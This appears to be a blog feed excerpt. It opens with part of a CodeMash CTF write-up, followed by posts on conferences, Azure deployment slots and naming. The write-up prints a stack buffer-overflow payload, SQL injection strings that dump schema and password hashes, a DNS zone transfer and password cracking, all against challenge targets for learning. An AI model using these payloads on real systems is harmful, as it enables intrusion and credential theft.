<p>Which can then be converted to the flag itself using an <a href="https://www.asciitohex.com/">ASCII to hex converter</a>. </p><h2 id="the-parrot">The Parrot</h2><p>This challenge had a single pdf file called parrot.pdf. Though when attempting to open the pdf to view it's contents, I was presented with a password dialog.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-5.png" class="kg-image"></figure><p>This is a password protected PDF and I needed a way to get the password so that I can open the PDF in order to see what's inside.</p><p>For this, I used a tool called PDFcrack and a collection of commonly used passwords called <a href="https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt">rockyou.txt</a>. Putting the two together, I got the following result:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/parrot_console.png" class="kg-image"></figure><p>You'll notice on the very last line, the program managed to find the password "cracker".</p><p><em>Note: I later found out that if you open the pdf in a text editor and look at the Authors, it actually spells out the password if you look closely:</em></p><p><em>&lt;&lt; /Authors: <strong>c</strong>harlie <strong>r</strong>omeo <strong>a</strong>lfa <strong>c</strong>harlie <strong>k</strong>ilo <strong>e</strong>cho <strong>r</strong>omeo &gt;&gt;</em></p><p>Moving on!</p><p>When the PDF was opened, it contained the following image:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-7.png" class="kg-image"></figure><p>In order to get the image out of the PDF, I used another tool called pdfimages. At this point, I already knew the password, so I ran pdfimages with the password 'cracker'.</p><pre><code>pdfimages parrot.pdf -upw cracker .
</code></pre>
<p>This command extracted two images in <em>.ppm</em> format. Opening the first image and.. tada!</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-6.png" class="kg-image"></figure><h2 id="stacked-up">Stacked Up</h2><p>The challenge description stated that there was a vulnerable service running in the cloud and that it could be exploited in order to get the flag. A copy of just the binary was given freely for download.</p><p>Running the program locally, it just looked like it echo'd back whatever I typed in.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-21.png" class="kg-image"></figure><p>Doesn't seem like a very useful program, does it? I checked out what the hint had to say about this challenge. The hint plainly said:</p><p><strong>HINT:</strong> What happens if you input a veeeeeeeeeery long string?</p>
<p>Fair enough, I tried entering in a long string.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-22.png" class="kg-image"></figure><p>I didn't think that was incredibly surprising. With input that large I probably caused a buffer overflow.</p><p>However, at this point, I went down a pretty large rabbit hole. I spent a lot of time focus'd on the core dump, convinced that there was going to be something valuable inside of the stack trace when the program errored. Ultimately, I did not really get anywhere going down that path.</p><p>The next thing I wanted to try, was just to decompile this binary and see if I could make any sense of what was going on inside.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-17.png" class="kg-image"></figure><p>After decompiling the binary using <a href="https://www.hex-rays.com/products/decompiler/">IDA</a>, I noticed a couple really interesting things.</p><p>First, the main method had no jumps. There weren't any if statements and all the main() method did was get user input and print it out. I did not expect that at all.</p><p>Second, I noticed that there was a method called <strong>flag()</strong></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-23.png" class="kg-image"></figure><p>This method looked almost identical to the <strong>main()</strong> method with the exception that this method tried to open a file called flag.txt, and then print its contents.</p><p>I knew at this point the goal was going to be to call the flag() method. There must exist a flag.txt file on the remote server where the binary is running, and calling the flag method would read that file and print it out.</p><p>In order to do this, the <strong>return address </strong>of the main() method would need to be overwritten.</p><p>When a function is called (in this case main), the return address is stored on the stack and is just above the base pointer. If I overwrite the return address of the main method to point to the flag() method instead of the default return address, the program should call the flag method.</p><p>To accomplish this I needed a couple of things.</p><p>First, since the return address is right after the base pointer, I needed to know exactly how many characters were required to overflow the program before I started to spill over into the return address.</p><p>You can see here in this photo that the return address looks like </p><p><strong>0xff021b92 0x00007fff </strong>(the last two hex values on the top row)</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-19.png" class="kg-image"></figure><p>When I used a lot of A's in order to get the program to overflow, I noticed that the return address starts to get overwritten at the 1033rd character.</p><p>See the 41's that are bleeding over into the 3rd column?</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-20.png" class="kg-image"></figure><p>Ok, good progress! The 1033rd character is the start of the return address, so we need to fill the buffer with 1032 characters of junk, and then tack on the return address of the flag() method.</p><p>Using IDA again, I got the address of the flag() method just by clicking on the starting line of the method (0x400676):</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-24.png" class="kg-image"></figure><p>At this point, I have everything needed in order to call the flag() method. To create the input for the application, I just used python to generate all of the junk characters as well as append the address of the flag method to the end of the string</p><pre><code class="language-python">python -c 'print &quot;A&quot;*1032 + p32(0x400676)'
</code></pre>
<p>Connecting to the remote service, and using the generated input overwrites the return address, calls the flag() method, and prints the flag!</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-18.png" class="kg-image"></figure><h2 id="unicorn">Unicorn</h2><p>This challenge was relatively straight forward. A Unicorn.svg file was given, and that's about it.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-8.png" class="kg-image"></figure><p>Typically in CTFs, if you're given a svg, they expect you to manipulate the svg in some way in order to see the flag. </p><p>In the case of our cute little Unicorn, I just opened the file into an SVG editor and deleted the Unicorn. The flag was hidden behind it.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-9.png" class="kg-image"></figure><h2 id="danger-zone">Danger Zone</h2><p>This challenge had the following description:</p><pre><code>Can you enter the **danger.zone**, and find the flag?

Service listening on:

whale.hacking-lab.com:**5553**

Note: this is **NOT** about the web site danger.zone!
</code></pre>
<p>Like most CTFs, a lot of clues on how to solve the problem are given in the name and the description. For this challenge, it talks about <strong>danger.zone</strong> and a service that is running on port 5553. The hint itself also really helpful:</p><p><strong>HINT:</strong> Find out what service is listening on the port. <strong>nmap</strong> could be helpful for this kind of fingerprinting.</p>
<p>Sounds like a good idea to start off this challenge, so I did just that. Running nmap for port 5553 tells us that the service that is running is a <em>domain </em>service with a version of <em>ISC BIND 9.9.5</em></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-13.png" class="kg-image"></figure><p>With this information, we now know that port 5553 is running a domain service, which means its most likely running a custom DNS service.</p><p>For DNS problems, <strong><a href="https://linux.die.net/man/1/dig">dig </a></strong>can be<strong> </strong>incredibly helpful. Since I now knew that the service is a DNS service (and is probably vulnerable), I used dig to look up some more information about it while trying to access <strong>danger.zone</strong>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-14.png" class="kg-image"></figure><p>I was able to successfully query danger.zone<strong> </strong>using the DNS service, and on top of that, danger.zone exists as a record in the zone file for the DNS! Which ultimately tells me that I should be able to perform a <a href="https://en.wikipedia.org/wiki/DNS_zone_transfer">zone transfer</a>.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-15.png" class="kg-image"></figure><p>After performing the zone transfer, the zone file is printed to the screen, and I can see the flag that was put inside.</p><h2 id="mrs-robot">Mrs Robot</h2><p>For this challenge, a webpage that prompted us for a secret word was given.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-10.png" class="kg-image"></figure><p>Viewing the source didn't really bring about anything of interest. Maybe the fact that each word that was typed in just redirected to a webpage that was an md5 hash of the input:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-11.png" class="kg-image"></figure><p>This led me to believe that the flag was an HTML file on the webserver, and the name of the HTML file was the secret word in an md5 hash. </p><p>I could use something like DirBuster to find the file for me, hashing common words and checking if the file exists, but I might be there for awhile.</p><p>Luckily, the site did have a <a href="http://www.robotstxt.org/">robots.txt</a> file that contained the following:</p><pre><code>User-agent: *
Disallow: /481065fd79b253104aeab5ca5c717cd5.html
</code></pre>
<p>Well that looks promising!</p><p>Upon landing on the page in the robots.txt file, I was presented with the text:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-12.png" class="kg-image"></figure><p>If you're not already familiar with the <a href="https://roila.org/language-guide/vocabulary/">Robot Interaction Language</a>, a simple google search for both of these terms will bring up a table with all of the translations necessary to get this text into English.</p><p>Leveraging the table I got the secret word, <strong>winter</strong>, and thus the flag itself.</p><h2 id="cars">Cars</h2><p>For this challenge, a website with a search box and a login page was given. The goal was to login to the page using the <strong>admin </strong>account. </p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-27.png" class="kg-image"></figure><p>I was pretty sure this was going to be a SQL injection challenge, and the hint confirmed that:</p><p><strong>HINT:</strong> Can you find a way to make the search return more data than expected? What you might get, is not the password yet.</p>
<p>I started off by throwing some quotes at the search box as that's a pretty common approach to get some more information about the version of SQL and the query running behind the scenes. Using the following query:</p><pre><code>a'
</code></pre>
<p>The result that came back was:</p><pre><code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1
</code></pre>
<p>I didn't even use a %, and the behavior of the page did seem to lend itself to being a LIKE query. Inspecting the error more closely, I can see that the trailing SQL query is %'. So, my query of a' must have terminated the query, and %' is what was left over.</p><p>With this in mind I felt pretty confident the query was structured as so:</p><pre><code>SELECT .. FROM .. WHERE .. LIKE '%' + [input] + '%'
</code></pre>
<p>The next step was to start filling in the blanks in order to get some more information about the underlying database.</p><p>Using the following query, we can get a dump of all of the underlying tables and their columns</p><pre><code>a' union select table_name, column_name FROM information_schema.columns#
</code></pre>
<p>The <strong>a' </strong>is to finish the SELECT statement so that it's valid, and then I can UNION another SELECT statement to pull back information about the schema. Since this is a MySQL database, the pound symbol (#) is used to comment out the rest of the query. It would look something like the following:</p><pre><code>SELECT .. FROM .. WHERE .. LIKE '%a' UNION SELECT table_name, column_name FROM information_schema.columns#%'
</code></pre>
<p>The hash comments out the trailing %' from the real LIKE query</p><p>The results of this query looked like this:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-28.png" class="kg-image"></figure><p>At this point, we have all of the information we need to pull back the data that we're looking for. The <strong>users </strong>and the <strong>password.</strong></p><p>Doing another injection using the new tables and columns gives us this query:</p><pre><code>a' UNION select username,password_hash from Users#
</code></pre>
<p>Resulting in the following records:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-29.png" class="kg-image"></figure><p>There it is! The hash of the admin password.</p><p>I was pretty confident the hash was going to be an MD5 hash, so I knew I needed a rainbow table and hope that the hash had been cracked in the past.</p><p>I ended up using an online <a href="https://isc.sans.edu/tools/reversehash.html">Reverse Hash Calculator</a> which did have the hash already stored.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-30.png" class="kg-image"></figure><p>Using the username of <strong>admin </strong>and the password of <strong>dodge123</strong>, revealed the flag.</p><h2 id="on-site-challenge">On Site Challenge</h2><p>The description for the on site challenge was in the form of a Haiku:</p><pre><code>Games are played all night.
This one online, but there, board.
Code is history.
</code></pre>
<p>Reading the poem, I saw "but there, board". To me, <em>there </em>is hinting at the location of the flag. It is an on site challenge after all. On site, there is a place where <strong>board games </strong>are played, so that seemed like a logical conclusion to me.</p><p>Upon entering the room, I saw multiple identical QR codes on the wall:</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/20190111_075736-1.jpg" class="kg-image"></figure><p>Using a QR code reader, I saw that the QR code is actually a link to:</p><p><a href="https://www.owasp.org/index.php/User:Bill_Sempf">https://www.owasp.org/index.php/User:Bill_Sempf</a></p><p>Looking at the remainder of the Haiku "Code is <strong>history</strong>" I eventually figure out that its referring to the "View <strong>history</strong>" of the wiki which contains a strange entry that was added and then immediately removed about a minute later.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/image-16.png" class="kg-image"></figure><p>Viewing the revision in which lines were added, I saw what appears to be a Base64 encoded string. Putting that string into a Base64 decoder reveals the flag.</p>]]></content:encoded></item><item><title><![CDATA[CodeMash 2019]]></title><description><![CDATA[<p>What better way to start off the new year than with a conference? This was my first time attending <a href="http://www.codemash.org/">CodeMash</a>, and it was well worth the trip.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/Dwov0FDUwAAX_6o-3.jpeg" class="kg-image"></figure><p>CodeMash is an annual conference that is held at the <a href="https://www.kalahariresorts.com/ohio/">Kalahari Resorts</a> in Sandusky, Ohio. While the conference itself is only two days</p>]]></description><link>https://reese.dev/codemash-2019/</link><guid isPermaLink="false">5c3cb5a004e4b332a4385dfa</guid><category><![CDATA[conference]]></category><category><![CDATA[codemash]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Thu, 10 Jan 2019 19:52:00 GMT</pubDate><content:encoded><![CDATA[<p>What better way to start off the new year than with a conference? This was my first time attending <a href="http://www.codemash.org/">CodeMash</a>, and it was well worth the trip.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/Dwov0FDUwAAX_6o-3.jpeg" class="kg-image"></figure><p>CodeMash is an annual conference that is held at the <a href="https://www.kalahariresorts.com/ohio/">Kalahari Resorts</a> in Sandusky, Ohio. While the conference itself is only two days long, they do offer what they call "Precompilers" which you can just think of as pre-conference workshops.</p><h2 id="first-impressions">First Impressions</h2><p>It seems like many conferences may focus on specific frameworks such as .NET, or languages like JavaScript, CodeMash definitely makes an effort to be diverse in the content that they provide. I attended sessions discussing security, people skills, SQL, and the list goes on. </p><p>While not directly applicable to myself, the other thing I noticed is that CodeMash is incredibly family friendly. Not only was the conference held at an indoor waterpark, it's actually two conferences in one. The second name being KidzMash.</p><p>KidzMash is another conference that runs parallel to CodeMash, and provides sessions more geared towards.. you guessed it, kids! Topics included robotics, video game development, and even 3D printing. It made the whole experience feel very wholesome and welcoming. </p><p>To add onto that, I felt CodeMash had the most community involvement that I've ever seen in a conference. The conference had its own Slack channel where conference goers could ask questions as the conference was going on. You had people asking if anyone wanted to get together to play games, meetup to discuss another topic, etc. You never really felt alone or out of the loop.</p><h2 id="new-faces">New Faces</h2><p>It was refreshing to see a lot of newer faces giving presenations in each of the talks. Along with being family focus'd, CodeMash almost seemed to be driven to encourage those who may not have spoken before, to get up on stage and give it a shot. A select number of the speakers at the conference have never spoken before, and the conference explicitly calls out that they like to have those individuals come and present.</p><p>For those who it is their first time, CodeMash even pairs them up with a couple mentors that can give feedback on their presentation and pass on their expertise from having been there, and done that.</p><p>Not only did you get to see some of the bigger names in the tech world (e.g. Jon Skeet!), you got to introduce yourself to some newer members of the community. These individuals bring a fresh perspective and have their own opinions which I feel disrupts the echo chamber that we may find ourselves lost in from time to time.</p><h2 id="capture-the-flag">Capture the Flag</h2><p>Speaking of new faces, I met quite a few individuals who were also a part of the CodeMash CTF. For those unfamiliar, CTF (Capture the Flag) is an event where you are given a scenario in which you must obtain the "flag" in order to score points. Scenarios may include: a zip file that has been intentionally corrupted and you must figure out how to get inside to unzip the flag, an image that has a hidden message somewhere inside of it, or even a website that has a web page somewhere on the server and you must do everything possible to find it.</p><p>It was one of the best experiences I had at CodeMash, and the people involved were equally enjoyable to converse with. </p><p>The organizer, Bill Sempf, also runs the Columbus OWASP group and is an expert lock picker! Luckily one of the "open spaces" at the conference was an introduction to lock picking, so I was able to get some hands on experience picking locks which was a great time.</p><p>But I digress.</p><p>For the CTF, there's plans for next year to have those who were specifically passionate about the it (this guy) to create our own problems, rather than using problems created by someone else. I'm overly excited to be make some CTF problems coming up here in the near future.</p><h2 id="wrapping-up">Wrapping Up</h2><p>Taking everything into consideration, CodeMash is definitely worth it. At only 350$ a ticket, you get two full days of sessions, food, networking opportunities, and an after party. Contrast that with the typical pricing of conferences, it's worth at least giving it a try.</p><p>Great content, great speakers, in a great location. I will definitely be going back for CodeMash 2020.</p><p></p>]]></content:encoded></item><item><title><![CDATA[Another Year Another DEVintersection]]></title><description><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/dvlogo-2.png" class="kg-image"></figure><p>It's close to 32 degrees outside. Wind whipping at your coat. No you're not on a boat. But where are you? Admittedly that's a question with one too many answers, but I bet you wouldn't guess Las Vegas. DEVintersection 2018 was again, held in Las Vegas, Nevada at the MGM</p>]]></description><link>https://reese.dev/devintersection-2018/</link><guid isPermaLink="false">5c2794e704e4b332a4385ddc</guid><category><![CDATA[devintersection]]></category><category><![CDATA[conference]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Tue, 18 Dec 2018 22:18:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2019/01/dvlogo-2.png" class="kg-image"></figure><p>It's close to 32 degrees outside. Wind whipping at your coat. No you're not on a boat. But where are you? Admittedly that's a question with one too many answers, but I bet you wouldn't guess Las Vegas. DEVintersection 2018 was again, held in Las Vegas, Nevada at the MGM grand. And it was cold. Too cold my friends.</p><p>On top of that, I'm honestly not much of a gambler, so I spent much of my free time hopping from hotel to hotel, checking out the sites. Indoors. No matter! It was still a fantastic conference, and the theme did slightly change from that of last year.</p><p>If you recall my <a href="https://reesespieces.io/devintersection-2017/">previous post</a> on DEVintersection 2017, the theme was <strong>Docker </strong>and <strong>Microservices. </strong>It was a challenge to go to a session and be exposed to one or the other, even if the topic <em>seemed </em>like it was not related at all. While Docker and leveraging microservices are still being talked about, and are definitely not going anywhere, the theme this year definitely did shift.</p><h2 id="the-theme">The Theme</h2><p>It may not be incredibly surprising to hear that much of the conference was focused around Artificial Intelligence. It's gaining some traction in the tech community.</p><p>This year DEVintersection explicitly co-located with the Microsoft Azure + AI Conference. Now, Co-locating is pretty common for DEVintersection, it's why they call it an <em>intersection.. </em>so I guess I shouldn't have been so surprised going into the con that a large portion of it would have AI related content!</p><p>The AI keynote highlighted customers that used Microsoft cognitive services to build customer support bots, notably <a href="https://blog.vodafone.co.uk/2017/04/12/meet-tobi-chatbot-latest-addition-vodafone-uks-customer-service-team/">Tobi</a>. They showcased multiple demonstrations where it was near impossible to tell the difference between a two humans interacting with one another and a human interacting with a bot. Going as so far as to have the bot verbally speak. AI is going to have a huge impact in the customer service industry, even moreso than it does today.</p><p>Though the highlight of the AI keynote had to be a <strong>whiteboard compiler</strong>. Now, when they initially announced what they were going to do, I wasn't quite sure at what they were going to be ultimately doing. What the hell is a whiteboard compiler?</p><p>In the end, they drew an Azure DevOps pipeline on a whiteboard, took a photo of it, and then it was interpreted by Azure cognitive services to be turned into a usable deployment pipeline. From a whiteboard! A whiteboard I tell you!</p><h2 id="so-much-auth">So Much Auth</h2><p>My current area of focus, at work anyway, has to do with identity management. That is, user management within an enterprise including editing users, access to applications, the whole shebang. So unsurprisingly, I spent a large chunk of the conference attending workshops and sessions that closely aligned with identity and access management. Which for the most part means I spent the entire week with <a href="https://brockallen.com/">Brock Allen</a> and the <a href="https://solliance.net/Home/About">Solliance </a>team, it's pretty much all they do.</p><p>The irony of it all was that after spending two days in a workshop and attending a couple sessions all relating to OAuth and Identity/Access Management, Solliance held a Security After Dark meet and greet to field questions. One of the party goers had asked an OAuth implementation question, and through a number of back and forths the final response was <strong>"specifications are suggestions"</strong>.</p><p>Here I was, ready to go back to my office ready to lay down the "obey the spec" hammer, all to be brought back down to earth that it doesn't necessarily have to be that way.</p><p>Honestly though, it was good to hear. All to often I get stuck in this mindset of needing to find the perfect answer, the answer that has no equal and is obviously the way to go. Unfortunately in our field, such answers rarely exist. You can't just follow the spec word and word and produce a great product, or guarantee that it's going to be portable. Not everyone is going to follow the spec exactly, and the spec itself in some areas is pretty vague.</p><p>Moral of my entire Auth journey at DEVintersection would simply be, don't be afraid to diverge from the spec. At least a little bit.</p><h2 id="why-so-fast">Why So Fast?</h2><p>For me, the conference honestly was avoiding the cold and learning the ins and outs of the OAuth spec as well as how to implement it. Though with that said, this time around the conference seemed to go much quicker than the previous year. Maybe the new hotness wore off, or I'm getting more accustomed to conference going. Nevertheless, I'll be back again next year.</p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[Understanding Azure Deployment Slots]]></title><description><![CDATA[<p>Azure deployment slots are a fantastic feature of Azure App Services. They allow developers to have multiple versions of their application running at the same time with the added bonus of being able to re-route traffic between each instance at the press of a button. They can, however, generate a</p>]]></description><link>https://reese.dev/understanding-azure-deployment-slots/</link><guid isPermaLink="false">5beb764c7e759204ca2529ae</guid><category><![CDATA[azure]]></category><category><![CDATA[tutorial]]></category><category><![CDATA[devops]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Wed, 14 Nov 2018 01:19:00 GMT</pubDate><media:content url="https://reese.dev/content/images/2018/11/slots.png" medium="image"/><content:encoded><![CDATA[<img src="https://reese.dev/content/images/2018/11/slots.png" alt="Understanding Azure Deployment Slots"><p>Azure deployment slots are a fantastic feature of Azure App Services. They allow developers to have multiple versions of their application running at the same time with the added bonus of being able to re-route traffic between each instance at the press of a button. They can, however, generate a lot of confusion if you don't fully understand how they work.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/slots-2.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><h2 id="so-what-exactly-are-azure-deployment-slots">So what exactly are Azure Deployment Slots?</h2><p>Let's assume we have a web app running on Azure App Services. We'll call it <em>http://site.com. </em>When you create a new web application, Azure creates a deployment slot for you, typically called <em>production</em>. However, it's possible to add additional deployment slots. </p><p>Put simply,<strong> a deployment slot is another web application</strong>. It has it's own URL, it <em>could</em> have its own database, connection strings, etc. It can be configured any way you see fit. But why would you want to have two web applications? The most common reason is so that we can have a place to deploy new features to, rather than going straight to production, which can be a little risky. </p><p>To accomplish this, we would create a deployment slot called <em>staging</em>.<em> </em>The staging slot is where you would deploy all new changes to your application to validate that everything is working before the changes actually go live to your users. Think of it like a test environment. A test environment that's really easy to spin up and manage. Let's create a deployment slot called staging and have it be accessible via <em>http://site-staging.com</em></p><h2 id="creating-a-deployment-slot">Creating a Deployment Slot</h2><p>Creating a deployment slot is pretty simple. Open your Azure portal and navigate to your Web App resource. Once there, you should be able to see a menu item labeled <strong>Deployment slots.</strong></p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/image-1.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>Clicking on the <strong>Add Slot </strong>button opens the space to add a new deployment slot. Here you can specify the name of the slot (I used staging) and if you want to copy any pre-existing configurations (such as your current production deployment slot). Press <strong>OK </strong>and you're all set!</p><p>When the deployment slot is first created, it is empty. So you'll want to deploy your latest and greatest changes to your staging environment (or just re-deploy your current production version to get something up and running). Deploying to your new slot is really no different than deploying to your production slot. Using the same tooling, just select the <em>staging </em>slot, rather than the <em>production </em>slot.</p><p>At this point, we have two instances of our web application running. One is our production instance, supporting all of our production traffic and another staging environment that we are using for testing the latest and greatest features. When you are satisfied with your tests, you will need to <strong>swap </strong>the staging and production slots so that your users can benefit from your new features.</p><h2 id="swapping-deployment-slots">Swapping Deployment Slots</h2><p>Swapping deployment slots routes traffic from the <em>source </em>slot to the <em>target </em>slot. In our case, we want to swap the staging and production slots. This will route our users to the staging app (where our newest changes are) when they navigate to <em>http://site.com</em>.</p><figure class="kg-image-card kg-width-wide"><img src="https://reese.dev/content/images/2018/11/AzureSwap-1.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>While that is the easiest way to describe what is happening, there is a lot that is going on behind the scenes that is useful to know.</p><h2 id="when-swapping-source-and-target-matter">When Swapping... Source and Target Matter</h2><p>When performing a swap, you are presented with a <em>source </em>and a <em>target</em>. This may be a little confusing at first. Why would it matter? A swap is just flipping two things! While the end result will be the same, the key takeaway is that up-time is not guaranteed for the source slot.</p><p>This is because when you perform a swap, this is what is really happening:</p><ul><li>First, the staging slot needs to go through some setting changes. This causes the staging site to restart, which is fine.</li><li>Next, the staging site gets warmed up, by having a request sent to its root path (i.e. '/'), and waiting for it to complete.</li><li>Now that the staging site is warm, it gets swapped into production. There is no down time, since it goes straight from one warm site to another one.</li><li>Finally, the site that used to be production (and is now staging) also needs to get some settings applied, causing it to restart. Again, this is fine since it happens to the staging site.</li></ul><p>This process guarantees that your <em>destination </em>slot will always been warm and your users won't experience any downtime when the swap happens. Users may experience performance issues when navigating to the staging environment, but this is acceptable as it's not really a production environment.</p><h2 id="when-swapping-settings-are-swapped-too">When Swapping... Settings Are Swapped Too </h2><p><strong>Spoiler Alert: Not all settings are swapped. </strong>It is important to remember that when performing a swap, the settings of a deployment slot are also swapped.. but not all of them. </p><p>Some settings make sense to keep specific to the slot, these are called <em>slot settings</em> and can be configured in the Azure portal.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/image.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>When a setting has been flagged as a <em>slot setting </em>it <strong>will not</strong> be applied to the target site. This is useful for settings such as connection strings. Maybe you want to have a dedicated database for your staging environment so you create a slot setting to hold a connection string that connects to a database specifically set up for your staging environment.</p><p>Some settings <strong>will </strong>be swapped during the swap process. There are settings that are not marked as a "slot setting" under the <em>Application Settings</em> section. This can be useful for a couple of reasons, one of which could be to introduce a new slot setting. </p><p>If at first we apply the setting to staging, perform the swap, and then apply the setting to the staging environment again (the old production app), it's possible to add a new settings without incurring an application restart on the production application.</p><p>The Azure portal even tells you which settings will be applied before you perform the swap operation as shown below.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/azure_slot_preview.png" class="kg-image" alt="Understanding Azure Deployment Slots"><figcaption>Unfortunately the preview does not list <em>all </em>changes that will be applied to the deployment slot. I learned this the hard way.</figcaption></figure><h2 id="when-swapping-the-code-does-not-move">When Swapping... The Code Does Not Move</h2><p>This was something I wasn't always quite sure about until I dug into it a little more and ran some of my own experiments. When you deploy changes to a deployment slot, that is where the changes will forever reside until you deploy over them. Consider the following scenario:</p><p><strong>Version 1</strong> of your application is deployed to your production deployment slot.</p><p><strong>Version 2</strong> of your application is deployed to your staging deployment slot.</p><p>As we learned previously, each deployment slot is its own web application. When a swap is performed, Azure swaps the virtual IP address of the source and destination and applies the appropriate settings. The code stays with their respective web applications, so the staging web app effectively becomes the production web app, and the production web app becomes the staging web app.</p><p>Put another way, imagine having two boxes. One box has black licorice it in labeled "production", and the other box has KitKats inside of it labeled "staging".</p><p><em>Note: To get this analogy right, you just need to agree that KitKats are the superior candy. </em></p><p>Your customers are currently going to the black licorice box, but you realize it's time to give them an upgrade. So you swap the location of the boxes. You also swap the labels on the boxes. This puts the "production" label on the KitKat box and the "staging" label on the black licorice box. Directing your customers to the box of delicious KitKats. They obviously rejoice. </p><p>Admittedly, it's sort of a silly example, but I hope it clears up the fact that when you perform a swap, we aren't picking up whats inside the box and moving them to a different box. We're simply relabeling the boxes themselves.</p><h2 id="rolling-back-changes">Rolling Back Changes</h2><p>If the ability to be able to test your changes before going live isn't enough of an incentive to begin leveraging deployment slots, the ability to roll back your changes at the press of a button should be enough to convince you.</p><p>After performing a swap, our users are now hitting the latest version of our application. If for some reason we missed something and we start noticing errors, all we have to do is swap again to put the system back into its previous state.</p><p>There's no need to open up Git, revert the commit, and re-deploy the change. We don't need to deploy anything at all! It's just a matter of routing our users back to the site that was working for them previously.</p><h2 id="testing-in-production">Testing in Production</h2><p>There's also this nifty little feature that we can leverage called <em>Testing in Production. </em>Testing in Production is essentially Azure's implementation of a <strong>canary test</strong>. If you're unfamiliar with the term, it stems from the mining days where miners would bring a canary down with them into the mine. If the canary died, they'd know something was wrong with the air quality, warning them to leave the mine as soon as possible.</p><p>We do canary testing by routing a small subset of users to our new feature. Continuing with the production and staging examples, what we do is take 5% of all traffic to our website and actually have them go to our staging environment with the remaining 95% continuing to hit our production environment. If we don't notice anything wrong, we can bump the 5% up to 10% or even 20%, until we've reached 100%. This way if anything were to go wrong, we've mitigated the number of users impacted by a bad change.</p><p>If you're interested in trying this feature out, it is relatively simple to get going. Simply click on the <em>Testing in Production </em>menu item from within your App Service.</p><figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/image-3.png" class="kg-image" alt="Understanding Azure Deployment Slots"></figure><p>This will allow you to set the percentage of traffic that you want to see going to your staging slot (5% as shown in the figure) and production slot. That's all there is to it!</p><h2 id="wrapping-up">Wrapping Up</h2><p>Deployment slots are incredibly easy to use and offer a wide range of features that make them hard to pass up. If you're hosting your application in Azure, definitely consider them for your current and/or next project!</p><p></p><p></p>]]></content:encoded></item><item><title><![CDATA[The Importance of Naming]]></title><description><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/Strip-Trouver-le-nom-de-variable-english650-final.jpg" class="kg-image"><figcaption>A story all too real...</figcaption></figure><p>We've all seen the joke, time and time again --</p><blockquote><em>"There are only two hard things in Computer Science: off by one errors, cache invalidation, and <strong>naming things</strong>."</em></blockquote><p>It's true. Naming things can be really hard. There seems to be all of these hidden rules</p>]]></description><link>https://reese.dev/the-importance-of-naming/</link><guid isPermaLink="false">5bf32a007e759204ca2529c2</guid><category><![CDATA[work]]></category><category><![CDATA[devops]]></category><category><![CDATA[coding style]]></category><dc:creator><![CDATA[John Reese]]></dc:creator><pubDate>Tue, 16 Oct 2018 00:03:00 GMT</pubDate><content:encoded><![CDATA[<figure class="kg-image-card"><img src="https://reese.dev/content/images/2018/11/Strip-Trouver-le-nom-de-variable-english650-final.jpg" class="kg-image"><figcaption>A story all too real...</figcaption></figure><p>We've all seen the joke, time and time again --</p><blockquote><em>"There are only two hard things in Computer Science: off by one errors, cache invalidation, and <strong>naming things</strong>."</em></blockquote><p>It's true. Naming things can be really hard. There seems to be all of these hidden rules around how we can name our properties and classes.</p><blockquote><strong>You:</strong> I'm just going to introduce this helper class, FileHelper.cs</blockquote><blockquote><strong>The World:</strong> No! You can't use <em>Helper </em>in your class! That's just begging to violate the single responsibility principle.</blockquote><p>But naming things correctly can save yourself and others a lot of time. I'll share with you an example from earlier this week. Consider this command:</p><p><strong>webdriver-manager start</strong></p><p>Assuming you had no knowledge of what this command did, I bet you have some guesses. Maybe you would have only one guess, and I'd honestly be Okay with that. You're probably thinking:</p><blockquote>Well.. it starts the web driver 